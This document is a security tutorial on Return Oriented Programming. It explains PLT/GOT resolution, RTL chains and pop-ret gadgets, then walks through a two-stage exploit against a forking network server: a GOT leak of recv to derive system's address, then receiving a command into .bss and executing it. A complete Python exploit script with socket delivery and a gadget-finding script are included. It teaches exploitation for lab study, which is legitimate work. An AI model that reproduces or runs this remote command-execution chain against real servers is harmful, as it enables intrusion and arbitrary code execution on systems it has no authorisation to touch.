0x07. Return Oriented Programming
ROP?
Bypassing memory protections (DEP, ASLR).
ROP (Return Oriented Programming) chains short instruction sequences (gadgets) that already exist in executable memory, so it needs no executable stack and works where DEP and ASLR defeat plain shellcode. It builds on the material covered before this point: the PLT and GOT, GOT overwrite, RTL (return-to-libc) and the RTL chain. The new ingredient is the gadget.
Basic knowledge
PLT and GOT: the first call of a function (lazy binding)
1. .text: call func@plt
2. PLT entry: jmp *func@got
3. Before the first call the GOT slot does not hold the function; it holds the address of the next instruction in the PLT entry (plt + 6), so control comes straight back into the PLT.
4. PLT entry: push reloc_offset (the index of this function's relocation entry)
5. PLT0: push the address of the link_map struct (kept in the GOT)
6. PLT0: jmp _dl_runtime_resolve, which calls _dl_fixup(link_map, reloc_offset); this is the entry into the dynamic linker
7. _dl_fixup: from reloc_offset find the symbol table (SYMTAB) entry, then the .strtab address and the name offset of the function
8. _dl_lookup_symbol_x: search the loaded libraries for that name and return the library (libc) that defines it
9. _dl_fixup: compute the real address of the function inside libc
10. _dl_fixup: write that address into the GOT slot
11. return to _dl_runtime_resolve
12. _dl_runtime_resolve: jump to the resolved function, which now runs with the caller's original arguments
PLT and GOT: every later call
1. .text: call func@plt
2. PLT entry: jmp *func@got
3. The GOT slot now holds the resolved address, so the jump lands directly in the function.

GOT overwrite
If an attacker can write into the GOT slot, step 3 jumps wherever the slot points: the program's own call func@plt becomes a call to an arbitrary function of the attacker's choosing.
RTL chain
Stack layout after the overflow, lowest address first; ESP points at the first slot when the vulnerable function executes ret:

    return address 1   -> address of function 1
    pop; pop; ret      -> gadget, used as function 1's return address
    parameter 1        -> argv[1] of function 1
    parameter 2        -> argv[2] of function 1
    return address 2   -> address of function 2
    ...
    return address 3
    return address 4

1. The vulnerable function returns into function 1, which reads argv[1] = parameter 1 and argv[2] = parameter 2 from the stack and executes.
2. Function 1's epilogue returns into the pop; pop; ret gadget. The two pops move ESP past parameter 1 and parameter 2, and ret then lands on return address 2, so function 2 is called the same way, and so on down the chain.
ROP gadget
A gadget is a short instruction sequence that already exists in executable memory and ends in ret. The pop; pop; ret gadget above is the basic case: each pop moves ESP up one slot, discarding one argument, and ret uses the slot ESP then points at (return address 2 in the example) as the next return address. The gadget must have exactly as many pops as the function has arguments; one pop too few leaves an argument under ESP and ret jumps into it, one too many eats the next return address.
ROP (Return Oriented Programming)
ROP (Return Oriented Programming): the normal call
.code section: call recv@plt, i.e. recv(fd, buf_address, sizeof(buf), 0). Stack at the call, lowest address first:

    next instruction   (return address)
    fd
    buf_address
    sizeof(buf)
    0
ROP (stage 1): the leak
The recv into buf overflows the stack (stack corruption). The saved return address is replaced with send@plt, followed by a junk return address ("ABCD") and send's four arguments, so when the vulnerable function returns it executes send(hacker_fd, recv_got, 4, 0). Left: the original slots, right: what they become:

    next instruction   -> send@plt  (overwritten return address)
    fd                 -> ABCD      (return address for send; junk, the process crashes only after the leak is out)
    buf_address        -> hacker file descriptor
    sizeof(buf)        -> recv_got
    0                  -> 4
                       -> 0
ROP (stage 1): send(hacker_fd, recv_got, 4, 0) sends the 4 bytes stored in recv's GOT entry to the attacker's connection. Why recv_got? The GOT entry of a function that has never been called only holds plt + 6, but recv has already been called (it read this very payload), so its GOT entry holds recv's real address inside libc. From that address and the fixed distance between recv and system inside libc (the offset) the address of system follows, even under ASLR.
ROP (stage 1): the offset. Within one libc build the distance between two functions is constant; ASLR only moves the base. In gdb, with the target's libc loaded:

    p recv               -> 0xb7f03bf0
    p system             -> 0xb7e56190
    p/x recv - system    -> 0xada60
    p/x recv - 0xada60   -> 0xb7e56190 <system>

offset = recv - system, so at run time system = leaked_recv - offset.
ROP (stage 0): the execution
Same overflow of the recv into buf, but now the return address becomes recv@plt, with a pop; pop; pop; pop; ret gadget (ppppr) as recv's return address, recv's four arguments, then system, a junk return address and system's argument:

    next instruction   -> recv@plt  (overwritten return address)
    fd                 -> ppppr     (return address for recv)
    buf_address        -> hacker file descriptor
    sizeof(buf)        -> bss
    0                  -> len(cmd)
                       -> 0
                       -> system    (ppppr's ret lands here)
                       -> ABCD      (return address for system)
                       -> bss       (argument of system)
ROP (stage 0): recv(hacker_fd, bss, len(cmd), 0) reads the command string cmd from the attacker's connection into the .bss section, ppppr discards the four arguments, and system(bss) runs the command. Why .bss? It holds the program's uninitialized global variables, which C defines as zero-filled, so it is writable, sits at a fixed address in the (non-randomized) binary, and does not move with ASLR. Because it starts out as zeros, a string received there is NUL-terminated as long as nothing else is stored right behind it; sending the terminator as part of cmd removes the dependency.
ROP (Return Oriented Programming): debugging the exploit
1. Start the target under gdb.
2. set follow-fork-mode child, so gdb follows the child the server forks for the connection instead of staying in the listener.
3. run
4. Connect to the server: nc localhost port (ex) nc localhost 7777).
5. Send the payload from the exploit script (ex) python test.py).
6. When finished, look up the leftover pids and kill them: killall [binaryname] (ex) killall python).
DEMO
Demo target
The server talks to the client with send and recv and has a writable .bss section; the recv into a fixed-size stack buffer is the stack corruption. The attack runs in two stages.
ROP (stage 1)
- send the GOT entry of recv to the attacker's connection.
- compute system from the leaked address and the known offset.
ROP (stage 0)
- recv the command into the .bss section, then call system on it.
- recv and system are chained as an RTL chain, the same construction as in stage 1.
ROP (stage 1): the stack corruption. The vulnerable buffer is 100 bytes, but recv reads up to 200 bytes. The payload is therefore 100 bytes of filler, 4 bytes that overwrite the saved frame pointer (SFP), then the new return address, and the rest of the chain after it.
ROP (stage 1): find the gadget for stage 1.
ROP (stage 1): calculate the system address and pack it. Every stack slot is written as a 4-byte little-endian value, in Python struct.pack("<I", value):

    struct.pack("<I", 0x12345678) == "\x78\x56\x34\x12"
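The payload construction described by the stage 1 and stage 0 figures, the RTL-chain layout, the 100-byte buffer plus 4-byte SFP, and the system = recv - offset calculation, as one added example script. This is not the slides' test.py; every address except the 0xada60 offset quoted from the gdb session is a constructed placeholder, and hacker_fd (the server-side descriptor of the attacker's connection) must be confirmed in gdb.

```python
import socket
import struct

# Constructed placeholder addresses for a 32-bit, non-PIE target with lazy
# binding. They are NOT the demo binary's values: take the real ones from
# objdump -d (PLT entries, gadget), readelf -S (.bss) and the GOT.
RECV_PLT = 0x08048450   # recv@plt
SEND_PLT = 0x08048470   # send@plt
RECV_GOT = 0x0804A018   # GOT slot of recv; holds recv's libc address once resolved
BSS      = 0x0804A040   # writable, not randomized: the command is received here
PPPPR    = 0x08048690   # pop; pop; pop; pop; ret
OFFSET_RECV_SYSTEM = 0xADA60   # recv - system, the value from the gdb session

BUF_SIZE = 100   # vulnerable stack buffer (recv reads up to 200 bytes)
SFP_SIZE = 4     # saved ebp between the buffer and the return address


def p32(value):
    """One x86 stack slot: 32-bit little-endian, i.e. struct.pack('<I')."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def u32(data):
    """Four leaked bytes back into an address."""
    return struct.unpack("<I", bytes(data[:4]))[0]


def overflow_prefix():
    """Filler through the saved frame pointer; the next slot is the return address."""
    return b"A" * BUF_SIZE + b"B" * SFP_SIZE


def rtl_link(func, args, next_ret):
    """One RTL link: func, the slot func returns into, then func's arguments.
    next_ret must be a pop*len(args); ret gadget if the chain continues, or
    junk if func is the last call of the chain."""
    return p32(func) + p32(next_ret) + b"".join(p32(a) for a in args)


def stage1_payload(hacker_fd):
    """send(hacker_fd, recv_got, 4, 0): leak recv's resolved GOT entry. The
    slot is resolved because the server already called recv to read this
    payload. send is the last call, so its return slot is junk ('ABCD')."""
    return overflow_prefix() + rtl_link(SEND_PLT, [hacker_fd, RECV_GOT, 4, 0], u32(b"ABCD"))


def system_from_leak(leaked):
    """system = recv - offset; the offset is fixed per libc build, only the base moves."""
    return u32(leaked) - OFFSET_RECV_SYSTEM


def stage0_payload(hacker_fd, system_addr, cmd):
    """recv(hacker_fd, bss, len(cmd), 0) followed by system(bss). recv returns
    into ppppr, which pops recv's four arguments and returns into system;
    system's return slot is junk and its only argument is bss."""
    if not cmd.endswith(b"\0"):
        cmd += b"\0"          # terminate explicitly instead of trusting .bss zeros
    chain = rtl_link(RECV_PLT, [hacker_fd, BSS, len(cmd), 0], PPPPR)
    chain += rtl_link(system_addr, [BSS], u32(b"ABCD"))
    return overflow_prefix() + chain, cmd


def return_address_of(payload):
    """The slot that overwrites the saved return address (offset 104 here)."""
    return u32(payload[BUF_SIZE + SFP_SIZE:])


def exploit(host, port, hacker_fd, cmd):
    """Two connections: leak, then execute. This only works against a forking
    server, whose children inherit the parent's libc base, so the address
    leaked through one connection is still valid for the next one."""
    with socket.create_connection((host, port)) as s:
        s.sendall(stage1_payload(hacker_fd))
        leaked = b""
        while len(leaked) < 4:          # send() may hand us the 4 bytes in pieces
            leaked += s.recv(4 - len(leaked))
    system_addr = system_from_leak(leaked)
    payload, cmd = stage0_payload(hacker_fd, system_addr, cmd)
    with socket.create_connection((host, port)) as s:
        s.sendall(payload)              # triggers recv(hacker_fd, bss, len(cmd), 0)
        s.sendall(cmd)                  # consumed by that recv, then run by system(bss)
    return system_addr
```

Call exploit("localhost", 7777, 4, b"/bin/sh -c 'id > /tmp/rop'") against a lab target after replacing the placeholders. The builders are kept separate from the network code so the payload layout can be checked slot by slot (return_address_of, slicing) before anything is sent.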
ROP (stage 0): find the gadget and the .bss address for stage 0.
readelf -S <binary> (in the slides: readelf -S python) lists the section headers; the .bss entry gives the address used as bss.
objdump -d <binary> | grep -B4 ret (in the slides: objdump -d python) prints the four instructions before every ret; look for four consecutive pops followed by ret (ppppr) and use the address of the first pop.
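The gadget search above done programmatically, as an added example rather than code from the slides: it parses objdump -d output and reports every run of pops that ends in ret, so the exact pop count for a given number of arguments can be picked. The listing embedded below is constructed in objdump's format and is not the demo binary's disassembly.

```python
import re

# Constructed excerpt in objdump -d (AT&T) format; not the demo binary's code.
SAMPLE_LISTING = """\
08048680 <__libc_csu_init+0x50>:
 8048680:\t83 c4 1c             \tadd    $0x1c,%esp
 8048683:\t5b                   \tpop    %ebx
 8048684:\t5e                   \tpop    %esi
 8048685:\t5f                   \tpop    %edi
 8048686:\t5d                   \tpop    %ebp
 8048687:\tc3                   \tret
 8048688:\t8d 76 00             \tlea    0x0(%esi),%esi
 804868b:\t5e                   \tpop    %esi
 804868c:\t5f                   \tpop    %edi
 804868d:\tc3                   \tret
 804868e:\t5d                   \tpop    %ebp
 804868f:\te9 0c ff ff ff       \tjmp    80485a0 <frame_dummy>
 8048694:\tc3                   \tret
"""

# objdump separates address, opcode bytes and mnemonic with tabs.
INSTR = re.compile(r"^\s*([0-9a-f]+):\t[0-9a-f ]+\t(\S+)")


def instructions(listing):
    """Yield (address, mnemonic) per instruction line. Function headers, blank
    lines and grep's '--' separators yield None so a gadget cannot span them."""
    for line in listing.splitlines():
        m = INSTR.match(line)
        yield (int(m.group(1), 16), m.group(2)) if m else None


def find_pop_ret_gadgets(listing, min_pops=1):
    """Return [(address, pop_count)] for every run of consecutive pops that is
    immediately followed by ret. address is the first pop: that is the value
    placed on the stack as the return address."""
    gadgets, run = [], []
    for ins in instructions(listing):
        if ins and ins[1] == "pop":
            run.append(ins[0])
        elif ins and ins[1] in ("ret", "retq") and len(run) >= min_pops:
            gadgets.append((run[0], len(run)))
            run = []
        else:
            run = []          # anything else breaks the pop run
    return gadgets


def gadget_for_args(listing, nargs):
    """Address of a pop*nargs; ret gadget, or None. The count must match the
    argument count exactly: one pop too few leaves an argument under ESP, one
    too many consumes the next link's return address."""
    for addr, pops in find_pop_ret_gadgets(listing, nargs):
        if pops == nargs:
            return addr
    return None


if __name__ == "__main__":
    import sys
    # usage: objdump -d <binary> | python3 find_gadgets.py
    listing = SAMPLE_LISTING if sys.stdin.isatty() else sys.stdin.read()
    for addr, pops in find_pop_ret_gadgets(listing):
        print(f"{addr:#010x}: {'pop; ' * pops}ret")
```

On the constructed listing this finds a ppppr at 0x8048683 and a ppr at 0x804868b; the pop %ebp at 0x804868e is rejected because a jmp sits between it and the ret. Pipe the real objdump -d output in to run it on the target.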